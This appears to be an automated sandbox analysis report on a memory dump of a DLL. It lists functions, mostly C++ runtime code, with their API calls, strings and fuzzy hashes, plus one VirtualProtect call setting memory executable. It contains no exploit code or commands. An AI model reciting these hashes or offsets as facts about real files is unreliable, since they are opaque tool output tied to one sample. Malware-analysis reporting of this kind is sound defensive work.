Instruction ID: ea8ba72e40ad753315814d1c042902e016b618bb883a27b568b52eea37567ffc
Opcode Fuzzy Hash: 3a4ea944c3ad0dc6150481406e5a045e28f178525b5987d98dc1780c589b0e51
Instruction Fuzzy Hash: 8A113A759105188BCF01DBD4C854EFDB37ABF64B14F240908D420E7290CF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB898, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1DB89F
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB8A9
int.LIBCPMT ref: 6E1DB8C0

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DB8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB938

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 880930ce01781a4a03fa8f1737caac5d13fdfe7fbe68ba3640883e8ef13fae08
Instruction ID: c9f1e3159f9ec4fb34ac39465f89b69ca6839ad7977a225371c66b486d63b50d
Opcode Fuzzy Hash: 880930ce01781a4a03fa8f1737caac5d13fdfe7fbe68ba3640883e8ef13fae08
Instruction Fuzzy Hash: E91123B59105198BCF05DBE4C844EFEB37AAF64714F140908E411AB290CF789E88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB93E, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1DB945
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB94F
int.LIBCPMT ref: 6E1DB966

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DB9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB9DE

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 77350fd4f52f64371bee959c3376c9ecddbb44c681cc5f13c610983af09bbb35
Instruction ID: 0cf8869c9e7fe2bc64747d7e50309e8ab0ccf560e225cbacfe6cf7b543cb4068
Opcode Fuzzy Hash: 77350fd4f52f64371bee959c3376c9ecddbb44c681cc5f13c610983af09bbb35
Instruction Fuzzy Hash: A31159B591051CCBCF05EBE4C894EFEB37AAF54704F140908E521AB290CF749D88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF94B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CF952
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF95C
int.LIBCPMT ref: 6E1CF973

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF9EB

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 9e2d974579aa3e0147b8a555e38e530caf846cd6f441f6f4e1fa72fa73bd17ac
Instruction ID: 19326a9d7719609cb019ca64b5657d603507dd1e5f02a9f181aa328bcb773ce6
Opcode Fuzzy Hash: 9e2d974579aa3e0147b8a555e38e530caf846cd6f441f6f4e1fa72fa73bd17ac
Instruction Fuzzy Hash: B4117A759105289FCF01EBE4C864AFDF37AAF64B04F204809E021EB280CF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA1A5, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1CA1AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA1B6
int.LIBCPMT ref: 6E1CA1CD

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CA207
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA227
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA245

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5a2a0dcaedb117b7893cddb53dad807148b1f434fc6102fd90e1128fd11c4f3b
Instruction ID: 038259684511887e7304fa9311fe947217eccf771f2b54d6811a924041824975
Opcode Fuzzy Hash: 5a2a0dcaedb117b7893cddb53dad807148b1f434fc6102fd90e1128fd11c4f3b
Instruction Fuzzy Hash: A4115C7591052DCBCF01DBD4C844AFDB37AAF64B14F140909D511E7290CF78D985EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C46AB, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1C46B2
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C46BC
int.LIBCPMT ref: 6E1C46D3

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C4723
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C4741

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 3a48ebb510dfd7c8613794d7b0feef0b08f81e9f87b560980bef059fc7603b5c
Instruction ID: b1bbb36f3ce974606266bdfa6be00035076989d3f2f0ef3a311a289d9304dfd9
Opcode Fuzzy Hash: 3a48ebb510dfd7c8613794d7b0feef0b08f81e9f87b560980bef059fc7603b5c
Instruction Fuzzy Hash: 1C11487590462DCBCB01DBE4C814AFDB779BF24B14F100908E120EB290DB789985E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C75E8, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E1C75F4

Part of subcall function 6E1C73A9: std::exception::exception.LIBCONCRT ref: 6E1C73B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7602

Part of subcall function 6E1E3D74: RaiseException.KERNEL32(?,?,6E1C75E7,00000000,?,?,?,?,?,?,?,6E1C75E7,00000000,6E2814C0,?), ref: 6E1E3DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E1C7614

Part of subcall function 6E1C73E3: std::exception::exception.LIBCONCRT ref: 6E1C73F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7622
std::regex_error::regex_error.LIBCPMT ref: 6E1C7634

Part of subcall function 6E1C7426: std::exception::exception.LIBCONCRT ref: 6E1C743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7642

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: 8259015cbef123a37b24c563d5b27f521c912703c1c9c1617d5fd2e4d5e105ea
Instruction ID: 53c6ac099acc4f3c244312de25c5feb8dce0d371fcf3ff68a1c06f66eeb258c1
Opcode Fuzzy Hash: 8259015cbef123a37b24c563d5b27f521c912703c1c9c1617d5fd2e4d5e105ea
Instruction Fuzzy Hash: ABF01235C0050C7BCB06FAF4DC49CDEBB7DAA14504F804D21BA20965D1EB75A79E97D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C53EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6E1C53F5
__Getcvt.LIBCPMT ref: 6E1C540B
__Getcvt.LIBCPMT ref: 6E1C5445

Strings

true, xrefs: 6E1C547B
false, xrefs: 6E1C5466

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: 129c42d73cfcf5854ee97412bfe206344c48cd21f45318dfbd16754a16eea946
Instruction ID: 4bf78b0fe211f568805d874adafc3feb958ab96c6a9681ce4094544948a97193
Opcode Fuzzy Hash: 129c42d73cfcf5854ee97412bfe206344c48cd21f45318dfbd16754a16eea946
Instruction Fuzzy Hash: F72194B6D01218EFDB01DFE4C880AEEBB78BF15714F144466E9049F600EB349995DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E20970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E2096A5,?,?,6E209645,?,6E282D28,0000000C,6E20978A), ref: 6E20972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E209742
FreeLibrary.KERNEL32(00000000,?,?,?,6E2096A5,?,?,6E209645,?,6E282D28,0000000C,6E20978A), ref: 6E209765

Strings

mscoree.dll, xrefs: 6E209728
CorExitProcess, xrefs: 6E20973A

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 796e6444d5f5245c307bbaed419fb8c85de091e52bfd47d3223efb4feca62440
Instruction ID: 34003bfcad6186f19277b761f9977656ba6f3036cd36e95f19bf2f498b18fda9
Opcode Fuzzy Hash: 796e6444d5f5245c307bbaed419fb8c85de091e52bfd47d3223efb4feca62440
Instruction Fuzzy Hash: B0F0A4B190051DBFDF019F90C958F9EBFBAEB45712F104454A806A6150DB304A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E214E2A, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a922780fa2686a65b89e4e88ecd805d8e5f1adeb566fdaa0f56722fa6bd7de03
Instruction ID: 12ba495f18d550d402da53dc9144561aeb8492f18938f9b1c3e8a3880174dbdc
Opcode Fuzzy Hash: a922780fa2686a65b89e4e88ecd805d8e5f1adeb566fdaa0f56722fa6bd7de03
Instruction Fuzzy Hash: 0D71C23195821F9FDB118FD4C884AEFBBB6EF49315F140569EA2467280C7B18A46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A737, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E20A7A9
_free.LIBCMT ref: 6E20A7C9

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 29c2e27ee775f1d7ec5e3d75cce2d5fce0701a74ab88fb8b18da25a0307c33c1
Instruction ID: 8da94122120482963eb3a4320ad06f220fef5720222b60db2f9d082a915d6608
Opcode Fuzzy Hash: 29c2e27ee775f1d7ec5e3d75cce2d5fce0701a74ab88fb8b18da25a0307c33c1
Instruction Fuzzy Hash: 4541F376E403089FCB10CFB8C880A9EB7F6EF89714B658569D515EB291E730E902CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E21CCC3, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E21CCDB

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21CCED
_free.LIBCMT ref: 6E21CCFF
_free.LIBCMT ref: 6E21CD11
_free.LIBCMT ref: 6E21CD23

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fd5f0ce6d73c023e692cb4d911f0e95239a34f474b052342646876797ed72f6d
Instruction ID: e149d2dc1def0b1a9da9ed15b6017ed24f4d6d6ec98fc70cf8cb8537728c5639
Opcode Fuzzy Hash: fd5f0ce6d73c023e692cb4d911f0e95239a34f474b052342646876797ed72f6d
Instruction Fuzzy Hash: C3F04479444A0E97CA54CAD4E4C6C9B37EFAA0AB117704C15E126DB551D730F98486F1

Uniqueness

Uniqueness Score: -1.00%

Function 6E207D8A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 6E207F3C
__freea.LIBCMT ref: 6E207F5A

Strings

a/p, xrefs: 6E208021
am/pm, xrefs: 6E207FBD

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 74e3feb9bbd7fe18e0dbf5ea01890069fd50350d42b2cb33da837e29470c0dc7
Instruction ID: 6fd7686738a6b7622b97c0dfc978ff633e7bba2864f21a3c4520c790ff2acaa4
Opcode Fuzzy Hash: 74e3feb9bbd7fe18e0dbf5ea01890069fd50350d42b2cb33da837e29470c0dc7
Instruction Fuzzy Hash: A5D1E03591424F9FDB489FE8C8A4BABB7B3FF06301F184159E954AB2C4E3759980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BF218, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 188memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(6E2886A0,0000305A,00000040,6E28869C,?,00000000,677030D4,008B9687,?), ref: 6E1BF2D5

Strings

E9, xrefs: 6E1BF239, 6E1BF385
DZ(n, xrefs: 6E1BF27D
DZ(n, xrefs: 6E1BF498

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual
String ID: DZ(n$DZ(n$E9
API String ID: 544645111-138033316
Opcode ID: 30eb74fd42d4a76d51b7eec8f607349721be85b96f651f826f30124ddf3ab81f
Instruction ID: 9061cb366b589b9961d2ce01ec9ee1fd8626e6b7150f46ddf7e5a6f9bb5777f3
Opcode Fuzzy Hash: 30eb74fd42d4a76d51b7eec8f607349721be85b96f651f826f30124ddf3ab81f
Instruction Fuzzy Hash: 6D71C2759415519FCF04CFA9C8C96BF7BF6BB4B310B20805BE452DB281E334A588DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6E1C426E
_wcslen.LIBCMT ref: 6E1C4281

Strings

`k(n, xrefs: 6E1C42C8
For, xrefs: 6E1C4273, 6E1C4349

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`k(n
API String ID: 1260878687-225852470
Opcode ID: 5a8be394db58ec97b634d30895fca89b237643fefd997957420ccc73411d57df
Instruction ID: a9d9569edda9de889819896bc4c3b717947335c37ac6d796a75c9a302cfaa021
Opcode Fuzzy Hash: 5a8be394db58ec97b634d30895fca89b237643fefd997957420ccc73411d57df
Instruction Fuzzy Hash: B541D4396282298FC700DBD8C5D099D77B2BFAAB18B214245E451FB381C738D887E752

Uniqueness

Uniqueness Score: -1.00%

Function 6E218AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E218B1F
_free.LIBCMT ref: 6E218B75

Part of subcall function 6E218951: _free.LIBCMT ref: 6E2189A9
Part of subcall function 6E218951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
Part of subcall function 6E218951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
Part of subcall function 6E218951: WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60

Strings

0!#n, xrefs: 6E218AD8

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!#n
API String ID: 314583886-4232261716
Opcode ID: 8332ef9dfa41b1043facd51593fbc63d0a9db420ae5310b376d595ba17338aee
Instruction ID: 051f171e6a5d625e250e1f595eb15fb4ce7048ec10a967d2957bcc5fd7a56a74
Opcode Fuzzy Hash: 8332ef9dfa41b1043facd51593fbc63d0a9db420ae5310b376d595ba17338aee
Instruction Fuzzy Hash: 98216EB6C0821D5BDB2486A48CC1DDBB7FFDB52724F100695D6A6E6180EB704F84C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1A1F4E

Strings

ios_base::badbit set, xrefs: 6E1A1F0C, 6E1A1F31
ios_base::eofbit set, xrefs: 6E1A1F1B
ios_base::failbit set, xrefs: 6E1A1F16

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 398824b8ad84de54b8c9bc6e5c29bc3d1ef7961b943b7d461293996ba9082440
Instruction ID: 05eb59776bcbb382437538a95bb0e4c6f080153f8de447633dd2ba3e85aa6e90
Opcode Fuzzy Hash: 398824b8ad84de54b8c9bc6e5c29bc3d1ef7961b943b7d461293996ba9082440
Instruction Fuzzy Hash: D7F0F4F3A442182BDB40D9DCC801FEA73AD6B15314F248845EB50AB186FB65A8CECB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1C4084
_strlen.LIBCMT ref: 6E1C40AF
_strlen.LIBCMT ref: 6E1C40C6

Strings

[json.exception., xrefs: 6E1C409F, 6E1C40A7, 6E1C40C5, 6E1C40CD

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: b59d5832f5c06f6bc75d13ba37398d7c3eac517e6fe90bc0df8adefa3d09002c
Instruction ID: bc0faadba2bb0e03b215610f05de76b29a248e994dc31275bee453baeeda551f
Opcode Fuzzy Hash: b59d5832f5c06f6bc75d13ba37398d7c3eac517e6fe90bc0df8adefa3d09002c
Instruction Fuzzy Hash: 70F036B16002059FD704DFB8C8406FEB6FFBF44618F540919E409D7641DFB459849791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F345, Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E20F3D0
__alldvrm.LIBCMT ref: 6E20F5D1
__alldvrm.LIBCMT ref: 6E20F5F3

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: d759fa54c56c1364d42419361a8a0384893c51045b3d0ea6dcad755a8202193e
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: E8A14572A9428B9FF711CFA8C8907ABBFA6EF45314F2441A9D9949B2C1C7348941C758

Uniqueness

Uniqueness Score: -1.00%

